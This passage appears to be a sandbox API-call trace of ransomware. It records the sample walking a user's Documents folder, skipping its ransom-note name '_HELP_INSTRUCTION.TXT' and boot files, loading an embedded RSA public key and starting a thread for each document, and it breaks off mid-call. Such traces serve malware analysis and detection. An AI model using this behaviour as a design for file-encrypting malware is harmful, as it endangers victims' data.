lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0040.950] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.950] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2="..") returned 1 [0040.950] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2=".") returned 1 [0040.950] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0040.950] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.950] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0040.950] SetErrorMode (uMode=0x1) returned 0x1 [0040.950] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0040.950] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0040.950] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0040.950] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0040.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0040.951] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0040.951] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0040.951] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0040.951] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0040.951] lstrcmpW (lpString1="8uRJm.csv", lpString2="..") returned 1 [0040.951] lstrcmpW (lpString1="8uRJm.csv", lpString2=".") returned 1 [0040.951] StrStrW (lpFirst="8uRJm.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0040.951] StrStrW (lpFirst="8uRJm.csv", lpSrch="ntldr") returned 0x0 [0040.951] StrStrW (lpFirst="8uRJm.csv", lpSrch="NTLDR") returned 0x0 [0040.951] StrStrW (lpFirst="8uRJm.csv", lpSrch="NTDETECT.COM") returned 0x0 [0040.951] StrStrW (lpFirst="8uRJm.csv", lpSrch="ntdetect.com") returned 0x0 [0040.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0040.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0040.951] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0040.951] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.951] lstrcpyW (in: lpString1=0x17addc, lpString2="8uRJm.csv" | out: lpString1="8uRJm.csv") returned="8uRJm.csv" [0040.951] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0040.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4b4 [0040.952] Sleep (dwMilliseconds=0x96) [0041.164] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0041.164] lstrcmpW (lpString1="dUnN.ppt", lpString2="..") returned 1 [0041.164] lstrcmpW (lpString1="dUnN.ppt", lpString2=".") returned 1 [0041.164] StrStrW (lpFirst="dUnN.ppt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0041.165] StrStrW (lpFirst="dUnN.ppt", lpSrch="ntldr") returned 0x0 [0041.165] StrStrW (lpFirst="dUnN.ppt", lpSrch="NTLDR") returned 0x0 [0041.165] StrStrW (lpFirst="dUnN.ppt", lpSrch="NTDETECT.COM") returned 0x0 [0041.165] StrStrW (lpFirst="dUnN.ppt", lpSrch="ntdetect.com") returned 0x0 [0041.165] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0041.165] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0041.165] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0041.165] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.165] lstrcpyW (in: lpString1=0x17addc, lpString2="dUnN.ppt" | out: lpString1="dUnN.ppt") returned="dUnN.ppt" [0041.165] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4ac [0041.165] Sleep (dwMilliseconds=0x96) [0041.336] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0041.336] lstrcmpW (lpString1="DyX3zmFDQ.pps", lpString2="..") returned 1 [0041.336] lstrcmpW (lpString1="DyX3zmFDQ.pps", lpString2=".") returned 1 [0041.336] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0041.336] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="ntldr") returned 0x0 [0041.336] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="NTLDR") returned 0x0 [0041.336] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="NTDETECT.COM") returned 0x0 [0041.336] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="ntdetect.com") returned 0x0 [0041.336] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0041.336] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0041.336] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0041.336] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.336] lstrcpyW (in: lpString1=0x17addc, lpString2="DyX3zmFDQ.pps" | out: lpString1="DyX3zmFDQ.pps") returned="DyX3zmFDQ.pps" [0041.336] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c0 [0041.337] Sleep (dwMilliseconds=0x96) [0041.507] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0041.507] lstrcmpW (lpString1="Kv3rt4CpuhTFQ.pptx", lpString2="..") returned 1 [0041.507] lstrcmpW (lpString1="Kv3rt4CpuhTFQ.pptx", lpString2=".") returned 1 [0041.507] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0041.507] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="ntldr") returned 0x0 [0041.507] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="NTLDR") returned 0x0 [0041.507] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0041.507] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="ntdetect.com") returned 0x0 [0041.508] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0041.508] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0041.508] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0041.508] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.508] lstrcpyW (in: lpString1=0x17addc, lpString2="Kv3rt4CpuhTFQ.pptx" | out: lpString1="Kv3rt4CpuhTFQ.pptx") returned="Kv3rt4CpuhTFQ.pptx" [0041.508] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.508] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c4 [0041.508] Sleep (dwMilliseconds=0x96) [0041.685] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0041.685] lstrcmpW (lpString1="WHrA_.docx", lpString2="..") returned 1 [0041.685] lstrcmpW (lpString1="WHrA_.docx", lpString2=".") returned 1 [0041.685] StrStrW (lpFirst="WHrA_.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0041.685] StrStrW (lpFirst="WHrA_.docx", lpSrch="ntldr") returned 0x0 [0041.685] StrStrW (lpFirst="WHrA_.docx", lpSrch="NTLDR") returned 0x0 [0041.685] StrStrW (lpFirst="WHrA_.docx", lpSrch="NTDETECT.COM") returned 0x0 [0041.685] StrStrW (lpFirst="WHrA_.docx", lpSrch="ntdetect.com") returned 0x0 [0041.685] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0041.685] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0041.685] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0041.685] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.685] lstrcpyW (in: lpString1=0x17addc, lpString2="WHrA_.docx" | out: lpString1="WHrA_.docx") returned="WHrA_.docx" [0041.685] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a0 [0041.685] Sleep (dwMilliseconds=0x96) [0041.852] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0041.852] lstrcmpW (lpString1="YtaJJRAGe.rtf", lpString2="..") returned 1 [0041.853] lstrcmpW (lpString1="YtaJJRAGe.rtf", lpString2=".") returned 1 [0041.853] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0041.853] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="ntldr") returned 0x0 [0041.853] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="NTLDR") returned 0x0 [0041.853] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="NTDETECT.COM") returned 0x0 [0041.853] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="ntdetect.com") returned 0x0 [0041.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0041.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0041.853] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0041.853] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.853] lstrcpyW (in: lpString1=0x17addc, lpString2="YtaJJRAGe.rtf" | out: lpString1="YtaJJRAGe.rtf") returned="YtaJJRAGe.rtf" [0041.853] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 